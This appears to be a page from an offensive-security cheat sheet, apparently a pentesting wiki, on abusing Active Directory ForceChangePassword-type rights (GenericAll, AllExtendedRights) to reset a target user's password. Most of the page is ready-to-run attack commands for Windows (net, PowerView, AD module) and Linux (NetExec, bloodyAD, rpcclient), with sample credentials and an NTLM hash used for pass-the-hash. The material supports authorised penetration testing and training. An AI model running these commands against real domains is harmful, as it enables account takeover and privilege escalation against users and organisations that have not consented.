ForceChangePassword

If the attacker control an account that has GenericAll, AllExtendedRights, or User-Force-Change-Password over the target account, then the latter's password can be modified.

Windows

The net user command requires administrative privileges.

#---------------------#
# Living off the Land #
#---------------------#

# Net
net user bob Passw0rd123! /domain

# Net RPC
net rpc password "bob" "newP@ssword123!" -U "marvel.local"/"x7331"%"Passw0rd123!" -S "dc01.marvel.local"

# AD Module
Set-ADAccountPassword bob -NewPassword $((ConvertTo-SecureString 'NewPassword123!' -AsPlainText -Force)) -Reset -Verbose

#-----------#
# PowerView #
#-----------#

# Create a PSCredential object for the current user
$SecPassword = ConvertTo-SecureString 'Passw0rd123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('marvel\x7331', $SecPassword)

# Change the user's password
Set-DomainUserPassword -Identity bob -AccountPassword $((ConvertTo-SecureString 'NewPassw0rd123!' -AsPlainText -Force)) -Credential $Cred -Verbose

Linux

This permission can be leveraged from Linux using NetExec, BloodyAD, net, or rpcclient.

# NetExec
nxc smb 10.10.10.1 -u x7331 -p 'Passw0rd123!' -M change-password -o USER=bob NEWPASS='NewPassword123!'

# BloodyAD with plaintext credentials
bloodyAD -d marvel.htb -u x7331 -p 'Passw0rd123!' --host dc01.marvel.local set password bob 'NewPassword123!'

# BloodyAD with NTLM hash
bloodyAD --host 10.10.10.1 -d marvel.local -u x7331 -p :70016778cb0524c799ac25b439bd6a31 set password bob 'NewPassw0rd123!'

# Net
net rpc password bob 'newPassword123!' -U marvel.local/x7331%'Passw0rd123!' -S 10.10.205.81

# RPC
rpcclient -U marvel/x7331%'Passw0rd123!' 10.10.205.81
> setuserinfo2 bob 23 'newPassword123!'
# OR
> chgpasswd3 bob 'OldPassword123!' 'NewPassw0rd123!'
> exit

PreviousDCSync NextFullControl

Last updated 26 days ago

hashtagWindows

hashtagLinux

Windows

Linux